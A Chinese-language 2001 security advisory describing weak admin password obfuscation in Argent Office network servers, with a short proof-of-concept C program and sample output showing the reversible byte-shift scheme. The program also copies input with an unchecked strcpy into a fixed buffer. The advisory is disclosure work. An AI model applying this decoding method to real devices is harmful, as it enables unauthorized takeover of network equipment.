发布日期：2001-08-07
更新日期：2001-08-08

受影响系统：

Network Alchemy(Avaya) Argent Office

描述：

---

Network Alchemy公司开发的Argent Office产品是一套综合了语音分组交换、网络数据连
接以及拨入服务功能的网络服务器。

它的管理口令的加密机制非常简单。如果攻击者通过网络监听等手段获取到加密后的口令，
就可以非常容易地进行解密。一旦得到了设备口令，攻击者就可以控制该网络设备。

例如，为了重新启动系统，管理员必须通过tftp来获取下列文件：
nasystem/rebootwhenfree/00e007002666/password//

00e007002666是MAC地址，password是加密后的口令。如果攻击者获取了上述密文，就可以
进行解密。

<*来源：Jacek Lipkowski (sq5bpf@acid.ch.pw.edu.pl) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jacek Lipkowski (sq5bpf@acid.ch.pw.edu.pl)提供了下列测试方法：

/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
demonstrates how the password obfuscation
mechanism works in argent office products */

main(int argc,char **argv)
{
int i;
unsigned char buf[32];
strcpy(&buf,argv[1]);
for (i=0;i<strlen(argv[1]);i++)
printf("0x%2.2X ",buf[i]+0x11-i);
printf("\n");
}

Show the hex values for the password 'idiocy':

~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85



建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.midlandcomms.co.uk/argent_office.htm



浏览次数：3749
严重程度：0（网友投票）